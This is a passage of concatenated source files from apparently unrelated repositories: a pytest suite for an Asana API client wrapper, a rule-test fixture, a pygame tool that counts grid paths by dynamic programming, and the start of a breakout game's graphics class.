sections_in_project_test[i_sect]['gid'], params)
yield task_data_list
for task_data in task_data_list:
client.tasks.delete_task(task_data['gid'])
def filter_result_for_test(found_data, allowed_data, match_key,
key_by_index=False):
"""
The asana API often returns iterators of results. In this test module, many
results are first filtered by the allowable values so that any additional
items that may have been added by other tests do not conflate test results.
This only works for single-depth `match_key`s, so, for example, it can check
the 'gid' key if task data is supplied, but it couldn't check the 'gid' of
the first project in the list of projects in that task data.
Args:
found_data ([{str:any}]): The list of data returned by the asana API for
a query. This is likely really a single-iteration generator, but either
will be compatible.
allowed_data ([{str:any}]): The list of data that is "allowed" to be in
the `found_data`. All other data in `found_data` will be excluded.
match_key (str/int): The key to match in each item of the `found_data` and
`allowed_data`. Probably should be a string, but no reason it couldn't
be an int if you know what you are doing.
key_by_index (bool): Whether the results should be a dict keyed by the
index of the allowed data item (True) or whether a simple ordered list
should be returned (False).
Returns:
filt_data ([{str:any}]/{int:{str:any}}): The `found_data` that was present
in the `allowed_data`. This will be a dict indexed by the corresponding
index number of the matching `allowed_data` entry if `key_by_index` is
True; otherwise will be a list in the order of the `found_data` (which
would be the order provided by the API if this is directly from an
asana API query).
"""
if key_by_index:
filt_data = {}
else:
filt_data = []
# Nested fors must be in this order - expect found_data is a single-iter gen
for found_item in found_data:
for i_allowed_item, allowed_item in enumerate(allowed_data):
if found_item[match_key] == allowed_item[match_key]:
if key_by_index:
filt_data[i_allowed_item] = found_item
else:
filt_data.append(found_item)
break
return filt_data
def subtest_asana_error_handler_func(caplog, exception_type, log_index, func,
*args, **kwargs):
"""
Executes a subtest to confirm `@asana_error_handler` is properly decorating
the given function. This allows test for the given functions to setup
anything function-specific required prior to running these same tests steps.
Expected to be called by every function that uses the `@asana_error_handler`
decorator.
Args:
caplog (Caplog): The caplog fixture from the pytest test.
exception_type (AsanaError): The exact exception type that is expected to
be caught. Can be as generic as `AsanaError`, but testing for something
more specific is better to improve coverage.
log_index (int): The index to check in caplog for the desired exception
log message.
func (function): The reference to the function to call to test.
*args ([any]): The positional arguments to pass to the function to test
`func`.
**kwargs ({str:any}): The keyword arguments to pass to teh function to
test `func`.
"""
caplog.clear()
with pytest.raises(exception_type):
func(*args, **kwargs)
assert caplog.record_tuples[log_index][0] == 'asana_extensions.asana.client'
assert caplog.record_tuples[log_index][1] == logging.ERROR
assert 'API query failed' in caplog.messages[log_index]
@pytest.mark.no_warnings_only
def test_logging_capture_warnings(caplog):
"""
This tests that the `logging.captureWarnings(True)` line has been executed
in the `aclient` module.
This must be run with the `-p no:warnings` option provided to `pytest`. As
a result, it is skipped by default. See `/conftest.py` for options.
"""
caplog.set_level(logging.WARNING)
caplog.clear()
warnings.warn('Test warning')
assert caplog.record_tuples[0][0] == 'py.warnings'
assert caplog.record_tuples[0][1] == logging.WARNING
assert 'Test warning' in caplog.record_tuples[0][2]
def test_asana_error_handler(caplog):
"""
Tests the `@asana_error_handler` decorator.
"""
caplog.set_level(logging.ERROR)
def gen_text(text1, text2, text3):
return f'{text1} | {text2} | {text3}'
dec_gen_text = aclient.asana_error_handler(gen_text)
assert dec_gen_text('one', text3='three', text2='two') \
== 'one | two | three'
assert dec_gen_text._is_wrapped_by_asana_error_handler is True
def raise_error(exception_type):
raise exception_type
dec_raise_error = aclient.asana_error_handler(raise_error)
exception_types = [
asana.error.PremiumOnlyError,
asana.error.RateLimitEnforcedError,
]
for exception_type in exception_types:
subtest_asana_error_handler_func(caplog, exception_type, 0,
dec_raise_error, exception_type)
assert dec_raise_error._is_wrapped_by_asana_error_handler is True
@pytest.mark.parametrize('func_name', [
'_get_me',
'get_workspace_gid_from_name',
'get_project_gid_from_name',
'get_section_gid_from_name',
'get_user_task_list_gid',
'get_section_gids_in_project_or_utl',
'get_tasks',
'move_task_to_section',
])
def test_dec_usage_asana_error_handler(func_name):
"""
Tests that functions that are expected to use the `@asana_error_handler`
decorator do in fact have it.
"""
func = getattr(aclient, func_name)
assert func._is_wrapped_by_asana_error_handler is True
def test__get_client(monkeypatch):
"""
Tests the `_get_client()` method.
This relies on /config/.secrets.conf being setup with a real personal access
token.
"""
client = aclient._get_client()
assert client is not None
def mock_read_conf_file(conf_rel_file, # pylint: disable=unused-argument
conf_base_dir=None): # pylint: disable=unused-argument
"""
Return an empty dict instead of loading from file.
"""
return {}
# read_conf_file() returning bad config allows to confirm client cache works
orig_read_conf_file = config.read_conf_file
monkeypatch.setattr(config, 'read_conf_file', mock_read_conf_file)
client = aclient._get_client()
assert client is not None
monkeypatch.delattr(aclient._get_client, 'client')
with pytest.raises(aclient.ClientCreationError) as ex:
aclient._get_client()
assert "Could not create client - Could not find necessary section/key in" \
+ " .secrets.conf: 'asana'" in str(ex.value)
monkeypatch.setattr(config, 'read_conf_file', orig_read_conf_file)
def mock_client_access_token__missing( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys missing.
"""
return types.SimpleNamespace(headers={})
def mock_client_access_token__empty( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys present, but
empty values.
"""
return types.SimpleNamespace(headers={'asana-enable': ''})
def mock_client_access_token__existing( # pylint: disable=invalid-name
accessToken): # pylint: disable=unused-argument
"""
Mock the client creation via access token with header keys present and
with some existing values.
"""
return types.SimpleNamespace(headers={'asana-enable': 'existing'})
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__missing)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'new_user_task_lists',
}
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__existing)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'existing,new_user_task_lists',
}
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(asana.Client, 'access_token',
mock_client_access_token__empty)
client = aclient._get_client()
assert client is not None
assert client.headers == {
'asana-enable': 'new_user_task_lists',
}
def test__get_me(monkeypatch, caplog):
"""
Tests the `_get_me()` method.
This relies on /config/.secrets.conf being setup with a real personal access
token.
** Consumes 2 API calls. **
"""
caplog.set_level(logging.WARNING)
me_data = aclient._get_me()
assert me_data['gid']
def mock_read_conf_file(conf_rel_file, # pylint: disable=unused-argument
conf_base_dir=None): # pylint: disable=unused-argument
"""
Return a bad personal access token to pass client creation but fail API.
"""
return {
'asana': {
'personal access token': '<PASSWORD>',
},
}
# Function-specific practical test of @asana_error_handler
monkeypatch.delattr(aclient._get_client, 'client')
monkeypatch.setattr(config, 'read_conf_file', mock_read_conf_file)
subtest_asana_error_handler_func(caplog, asana.error.NoAuthorizationError,
0, aclient._get_me)
def test__find_gid_from_name(caplog):
"""
Tests the `_find_gid_from_name()` method.
No API calls. Methods that use this `_find_gid_from_name()` method will
verify API compatibility then. This stays focused on testing logic.
"""
caplog.set_level(logging.INFO)
data = [
{
'gid': 1,
'name': 'one and only',
'resource_type': 'workspace',
},
{
'gid': 2,
'name': 'two with dupe',
'resource_type': 'workspace',
},
{
'gid': 3,
'name': 'two with dupe',
'resource_type': 'workspace',
},
{
'gid': 4,
'name': 'not workspace',
'resource_type': 'organization',
},
]
resource_type = 'workspace'
gid = aclient._find_gid_from_name(data, resource_type, 'one and only', 1)
assert gid == 1
caplog.clear()
gid = aclient._find_gid_from_name(data, resource_type, 'one and only')
assert gid == 1
assert caplog.record_tuples == [
('asana_extensions.asana.client', logging.INFO,
'GID of workspace "one and only" is 1'),
]
with pytest.raises(aclient.MismatchedDataError):
aclient._find_gid_from_name(data, resource_type, 'one and only', -1)
with pytest.raises(aclient.DuplicateNameError):
aclient._find_gid_from_name(data, resource_type, 'two with dupe')
with pytest.raises(aclient.DataNotFoundError):
aclient._find_gid_from_name(data, resource_type, 'invalid name')
@pytest.mark.asana_error_data.with_args(asana.error.ForbiddenError)
def test_get_workspace_gid_from_name(monkeypatch, caplog, raise_asana_error):
"""
Tests the `get_workspace_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# To ensure compatible with _extract_gid_from_name(), validate data format
client = aclient._get_client()
workspaces = client.workspaces.get_workspaces()
workspace = next(workspaces)
assert 'gid' in workspace
assert 'name' in workspace
assert 'resource_type' in workspace
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.workspaces, 'get_workspaces', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.ForbiddenError, 0,
aclient.get_workspace_gid_from_name, 'one and only')
@pytest.mark.asana_error_data.with_args(asana.error.NotFoundError)
def test_get_project_gid_from_name(monkeypatch, caplog, project_test,
raise_asana_error):
"""
Tests the `get_project_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 3 API calls. **
(varies depending on data size, but only 3 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# Sanity check that this works with an actual project
proj_gid = aclient.get_project_gid_from_name(ws_gid, project_test['name'],
int(project_test['gid']))
assert proj_gid == int(project_test['gid'])
# To ensure compatible with _extract_gid_from_name(), validate data format
client = aclient._get_client()
projects = client.projects.get_projects({'workspace': str(ws_gid)})
project = next(projects)
assert 'gid' in project
assert 'name' in project
assert 'resource_type' in project
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.projects, 'get_projects', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.NotFoundError, 0,
aclient.get_project_gid_from_name, ws_gid, project_test['name'])
@pytest.mark.asana_error_data.with_args(asana.error.InvalidTokenError)
def test_get_section_gid_from_name(monkeypatch, caplog, project_test,
sections_in_project_test, raise_asana_error):
"""
Tests the `get_section_gid_from_name()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
# Only need 1 section
section_in_project_test = sections_in_project_test[0]
# Sanity check that this works with an actual section
try:
sect_gid = aclient.get_section_gid_from_name(project_test['gid'],
section_in_project_test['name'],
int(section_in_project_test['gid']))
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
assert sect_gid == int(section_in_project_test['gid'])
# To ensure compatible with _extract_gid_from_name(), validate data format
client = aclient._get_client()
sections = client.sections.get_sections_for_project(project_test['gid'])
section = next(sections)
assert 'gid' in section
assert 'name' in section
assert 'resource_type' in section
# Function-specific practical test of @asana_error_handler
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'get_sections_for_project',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.InvalidTokenError, 0,
aclient.get_section_gid_from_name, project_test['gid'],
section_in_project_test['name'])
@pytest.mark.asana_error_data.with_args(asana.error.ServerError)
def test_get_user_task_list_gid(monkeypatch, caplog, raise_asana_error):
"""
Tests the `get_user_task_list_gid()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 4 API calls. **
(varies depending on data size, but only 4 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
me_gid = aclient._get_me()['gid']
me_utl_gid = aclient.get_user_task_list_gid(ws_gid, True)
uid_utl_gid = aclient.get_user_task_list_gid(ws_gid, user_gid=me_gid)
assert me_utl_gid == uid_utl_gid
assert me_utl_gid > 0
with pytest.raises(AssertionError) as ex:
aclient.get_user_task_list_gid(0)
assert 'Must provide `is_me` or `user_gid`, but not both.' in str(ex.value)
with pytest.raises(AssertionError) as ex:
aclient.get_user_task_list_gid(0, True, 0)
assert 'Must provide `is_me` or `user_gid`, but not both.' in str(ex.value)
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.user_task_lists, 'get_user_task_list_for_user',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.ServerError, 0,
aclient.get_user_task_list_gid, 0, True)
@pytest.mark.asana_error_data.with_args(asana.error.InvalidRequestError)
def test_get_section_gids_in_project_or_utl(monkeypatch, caplog, project_test,
sections_in_project_test, raise_asana_error):
"""
Tests the `get_section_gids_in_project_or_utl()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 1 API call. **
(varies depending on data size, but only 1 call intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
# Only need 1 section
section_in_project_test = sections_in_project_test[0]
try:
sect_gids = aclient.get_section_gids_in_project_or_utl(
project_test['gid'])
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
assert int(section_in_project_test['gid']) in sect_gids
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'get_sections_for_project',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.InvalidRequestError, 0,
aclient.get_section_gids_in_project_or_utl, project_test['gid'])
@pytest.mark.asana_error_data.with_args(asana.error.NoAuthorizationError)
def test_get_tasks(monkeypatch, caplog, # pylint: disable=too-many-locals
project_test, sections_in_project_test, sections_in_utl_test,
tasks_in_project_and_utl_test, raise_asana_error):
"""
Tests the `get_tasks()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 4 API calls. **
(varies depending on data size, but only 4 calls intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
me_data = aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
params = {
'assignee': me_data['gid'],
'workspace': ws_gid,
}
fields = [
'assignee_section',
'due_at',
'name',
'projects',
]
tasks_found = aclient.get_tasks(params, fields)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_in_project_and_utl_test, 'gid', True)
assert len(tasks_to_check) == len(tasks_in_project_and_utl_test)
for i_task_expected, task_found in tasks_to_check.items():
task_expected = tasks_in_project_and_utl_test[i_task_expected]
assert task_found['assignee_section']['gid'] \
== sections_in_utl_test[0]['gid']
assert task_found['due_at'] is None
assert task_found['name'] == task_expected['name']
assert task_found['projects'][0]['gid'] == project_test['gid']
params = {
'project': project_test['gid'],
}
fields = [
'due_on',
'memberships.section',
'name',
'projects',
]
tasks_found = aclient.get_tasks(params, fields)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_in_project_and_utl_test, 'gid', True)
assert len(tasks_to_check) == len(tasks_in_project_and_utl_test)
for i_task_expected, task_found in tasks_to_check.items():
task_expected = tasks_in_project_and_utl_test[i_task_expected]
assert task_found['due_on'] is None
assert task_found['name'] == task_expected['name']
assert task_found['projects'][0]['gid'] == project_test['gid']
assert sections_in_project_test[0]['gid'] in \
[m['section']['gid'] for m in task_found['memberships'] \
if 'section' in m]
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.tasks, 'get_tasks', raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.NoAuthorizationError,
0, aclient.get_tasks, {})
@pytest.mark.asana_error_data.with_args(asana.error.PremiumOnlyError)
def test_move_task_to_section__common(monkeypatch, caplog, raise_asana_error):
"""
Tests common elements for the `move_task_to_section()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 1 API call. **
(varies depending on data size, but only 1 call intended)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
caplog.set_level(logging.ERROR)
try:
# Simple test that project is configured, but non-error result not used
aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
# Function-specific practical test of @asana_error_handler
client = aclient._get_client()
# Need to monkeypatch cached client since class dynamically creates attrs
monkeypatch.setattr(client.sections, 'add_task_for_section',
raise_asana_error)
subtest_asana_error_handler_func(caplog, asana.error.PremiumOnlyError,
0, aclient.move_task_to_section, -1, -2)
@pytest.mark.parametrize('is_utl_test, i_sect, move_to_bottom', [
# The order is crucial, as each depends on the residual state of the tasks
(False, 1, False),
(False, 0, True),
(True, 1, False),
(True, 0, True),
])
def test_move_task_to_section__parametrized(is_utl_test, i_sect, move_to_bottom,
sections_in_project_test, sections_in_utl_test,
tasks_movable_in_project_and_utl_test):
"""
Tests parametrized paths for the `move_task_to_section()` method.
This does require the asana account be configured to support unit testing.
See CONTRIBUTING.md.
** Consumes at least 14 API calls total. **
(varies depending on data size, but only 4 calls intended)
(API call count is 3 [+1 if not is_utl_test] for each parameter)
( with equal num with and without is_utl_test: 3.5*num_parameters)
Raises:
(TesterNotInitializedError): If test workspace does not exist on asana
account tied to access token, will stop test. User must create
manually per docs.
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
try:
# Simple test that project is configured, but non-error result not used
aclient._get_me()
except aclient.DataNotFoundError as ex:
# This is an error with the tester, not the module under test
raise TesterNotInitializedError('Cannot run unit tests: Must create a'
+ f' workspace named "{tester_data._WORKSPACE}" in the asana'
+ ' account tied to access token in .secrets.conf') from ex
if is_utl_test:
sects = sections_in_utl_test
else:
sects = sections_in_project_test
aclient.move_task_to_section(
tasks_movable_in_project_and_utl_test[0]['gid'],
sects[i_sect]['gid'], move_to_bottom)
params = {
'section': sects[i_sect]['gid'],
}
tasks_found = aclient.get_tasks(params)
tasks_to_check = filter_result_for_test(tasks_found,
tasks_movable_in_project_and_utl_test, 'gid')
assert len(tasks_to_check) == 2
if move_to_bottom:
assert tasks_to_check[-1]['gid'] \
== tasks_movable_in_project_and_utl_test[0]['gid']
else:
assert tasks_to_check[0]['gid'] \
== tasks_movable_in_project_and_utl_test[0]['gid']
def test_pagination(project_test, sections_in_project_test):
"""
Tests compatibility with `asana` package to ensure that any pagination is
handled in a way that is compatible with how this project expects it.
** Consumes at least 2 API calls. **
(varies depending on data size, but only 2 calls intended)
"""
client = aclient._get_client()
client.options['page_size'] = 1
sect_gids = aclient.get_section_gids_in_project_or_utl(project_test['gid'])
# Should match exactly, but other tests may have added more sects to server
assert len(sect_gids) >= len(sections_in_project_test)
for sect in sections_in_project_test:
assert int(sect['gid']) in sect_gids
```
#### File: unit/rules/conftest.py
```python
import pytest
from asana_extensions.rules import rule_meta
@pytest.fixture(name='blank_rule_cls')
def fixture_blank_rule_cls():
"""
Returns a blank rule with default returns for all abstract methods. This
can be used as is in most cases; in most other cases, this can serve as a
base with tests only needing to override individual methods via monkeypatch.
"""
class BlankRule(rule_meta.Rule):
"""
Simple blank rule to subclass Rule.
"""
@classmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Not needed / will not be used.
"""
return
@classmethod
def get_rule_type_names(cls):
"""
Not needed / will not be used.
"""
return []
def _sync_and_validate_with_api(self):
"""
Not needed / will not be used.
"""
return True
def execute(self, force_test_report_only=False):
"""
Not needed / will not be used.
"""
return True
return BlankRule
``` |
{
"source": "Jonathan-Cen/Dynamic-Programming-Count-Paths",
"score": 3
} |
#### File: Jonathan-Cen/Dynamic-Programming-Count-Paths/CountPathsFromBlueToRed.py
```python
import pygame
# Initialize pygame
pygame.init()
'''Define Colors'''
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
LIGHT_GREEN = (0, 150, 0)
RED = (255, 0, 0)
LIGHT_RED = (150, 0, 0)
BLUE = (0,0,255)
LIGHT_BLUE = (0,0,150)
'''Width, height, and Margin of each grid'''
WIDTH = 50
HEIGHT = 50
MARGIN = 8
NUM_OF_GRIDS = 8
GRID_WIDTH = ((MARGIN + WIDTH)*NUM_OF_GRIDS + MARGIN)
# Set the HEIGHT and WIDTH of the screen
WINDOW_WIDTH = int(((WIDTH + MARGIN)*NUM_OF_GRIDS + MARGIN) * 2.5)
WINDOW_HEIGHT = (HEIGHT + MARGIN)*NUM_OF_GRIDS + MARGIN
'''Initialize the fonts for this program'''
generalFont = pygame.font.Font('freesansbold.ttf', WINDOW_WIDTH//30)
buttonFont = pygame.font.Font('freesansbold.ttf', WINDOW_WIDTH//40)
#Text margins
TEXT_MARGIN = 0.05*(WINDOW_WIDTH - GRID_WIDTH)
#Button variables
button_width = WINDOW_WIDTH//6
button_height = WINDOW_WIDTH//40 + 10
button_x_calculate = GRID_WIDTH + WINDOW_WIDTH//20 #GRID_WIDTH + (WINDOW_WIDTH - GRID_WIDTH)//2 - button_width//2
button_x_reset = int(WINDOW_WIDTH * (4/5))
button_y = WINDOW_HEIGHT//2
def createInitializedPathArray(rows, cols, initValue = 0):
new_array = []
for row in range(rows):
new_row = []
for col in range(cols):
new_row.append(initValue)
new_array.append(new_row)
return new_array
#Using Dynamic Programming to find the number of paths
def countingPath(grid, row, col, paths):
if(not validSquare(grid, row, col)):
return 0
if(isAtEnd(grid, row, col)):
return 1
if(paths[row][col] == 0):
paths[row][col] = countingPath(grid, row + 1, col, paths) + countingPath(grid, row, col + 1, paths)
return paths[row][col]
def validSquare(grid, row, col):
try:
return grid[row][col] >= 0
except(IndexError):
return False
def isAtEnd(grid, row, col):
try:
return grid[row][col] == 2
except(IndexError):
return False
def countPath(grid):
start_row = 0
start_col = 0
empty = createInitializedPathArray(NUM_OF_GRIDS, NUM_OF_GRIDS)
return countingPath(grid, start_row, start_col, empty)
def getGrid(NUM_OF_GRIDS):
# Create a 2 dimensional array. A two dimensional
# array is simply a list of lists.
grid = []
for row in range(NUM_OF_GRIDS):
grid.append([])
for column in range(NUM_OF_GRIDS):
grid[row].append(0)
#Set the end position to red
grid[-1][-1] = 2
#Set the start position to blue
grid[0][0] = 1
return grid
def showText(screen, message, x, y):
textSurf = buttonFont.render(message, True, WHITE)
textRect = textSurf.get_rect()
textRect.center = (x, y) ## (distance from left, distance from top)
screen.blit(textSurf, textRect)
def blit_text(screen, message, startPosition):
words = message.split(' ')
space = generalFont.size(' ')[0]
max_width = WINDOW_WIDTH - 30
x,y = startPosition
for word in words:
word_surface = generalFont.render(word, True, WHITE)
word_width, word_height = word_surface.get_size()
if x + word_width >= max_width:
x = startPosition[0]
y += word_height #start a new row
screen.blit(word_surface, (x, y))
x += word_width + space
def displayButton(screen):
#Buttons on Screen
mouse = pygame.mouse.get_pos()
if(mouse[0] >= button_x_calculate and mouse[0] <= button_x_calculate + button_width and mouse[1] >= button_y and mouse[1] <= button_y + button_height):
pygame.draw.rect(screen, GREEN, (button_x_calculate, button_y,button_width,button_height))
else:
pygame.draw.rect(screen, LIGHT_GREEN, (button_x_calculate, button_y,button_width,button_height))
showText(screen, "Calculate", button_x_calculate + button_width/2, button_y + button_height/2 + 2)
if(mouse[0] >= button_x_reset and mouse[0] <= button_x_reset + button_width and mouse[1] >= button_y and mouse[1] <= button_y + button_height):
pygame.draw.rect(screen, RED, (button_x_reset, button_y,button_width,button_height))
else:
pygame.draw.rect(screen, LIGHT_RED, (button_x_reset, button_y,button_width,button_height))
showText(screen, "Reset", button_x_reset + button_width/2, button_y + button_height/2 + 2)
def calculateClicked(pos):
if(pos[0] >= button_x_calculate and pos[0] <= button_x_calculate + button_width and pos[1] >= button_y and pos[1] <= button_y + button_height):
return True
return False
def resetClicked(pos):
if(pos[0] >= button_x_reset and pos[0] <= button_x_reset + button_width and pos[1] >= button_y and pos[1] <= button_y + button_height):
return True
return False
def gameLoop():
grid = getGrid(NUM_OF_GRIDS)
screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
# Set title of screen window
pygame.display.set_caption("Count Paths From Blue to Red")
EXIT = False
paths = None
clock = pygame.time.Clock()
# -------- Main Program Loop -----------
while not EXIT:
screen.fill(BLACK)
intro_message = "Please specify obstacles by clicking on the grid. Obstacles are coloured in green."
blit_text(screen, intro_message, (GRID_WIDTH + TEXT_MARGIN, TEXT_MARGIN))
displayButton(screen)
#screen.blit(text, textRect)
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
EXIT = True # Flag that we are done so we exit this loop
elif event.type == pygame.MOUSEBUTTONDOWN:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
#Check if the user clicks the Calculate button:
if(calculateClicked(pos)):
paths = countPath(grid)
if(resetClicked(pos)):
grid = getGrid(NUM_OF_GRIDS)
paths = None
# Change the x/y screen coordinates to grid coordinates
column = pos[0] // (WIDTH + MARGIN)
row = pos[1] // (HEIGHT + MARGIN)
try:
if(grid[row][column] == 0):
grid[row][column] = -1
elif(grid[row][column] == -1): #allow the user to unselect an obstacle
grid[row][column] = 0
except(IndexError):
continue
if paths == None:
result_message = "Number of paths from blue to red: "
else:
result_message = "Number of paths from blue to red: " + str(paths)
blit_text(screen, result_message, (GRID_WIDTH + TEXT_MARGIN, WINDOW_HEIGHT*4/5))
# Draw the grid
for row in range(NUM_OF_GRIDS):
for column in range(NUM_OF_GRIDS):
color = WHITE
if grid[row][column] == -1:
color = GREEN
elif grid[row][column] == 2:
color = RED
elif grid[row][column] == 1:
color = BLUE
pygame.draw.rect(screen, color, [(MARGIN + WIDTH) * column + MARGIN,
(MARGIN + HEIGHT) * row + MARGIN,
WIDTH,
HEIGHT])
clock.tick(60)
pygame.display.update()
gameLoop()
pygame.quit()
``` |
{
"source": "JonathanCheng0101/SC101-projects",
"score": 3
} |
#### File: SC101-projects/SC101_Assignment2/breakoutgraphics.py
```python
from campy.gui.events.timer import pause
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmousemoved, onmouseclicked
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
FRAME_RATE = 1000 / 120
lives=3
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space.
window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
self.paddle = GRect(paddle_width,paddle_height) # Create a paddle.
self.paddle.filled = True
self.paddle.fill_color = "black"
self.paddle_height = paddle_height
self.paddle_width = paddle_width
self.window.add(self.paddle,(self.window.width-paddle_width)/2, self.window.height-PADDLE_OFFSET)
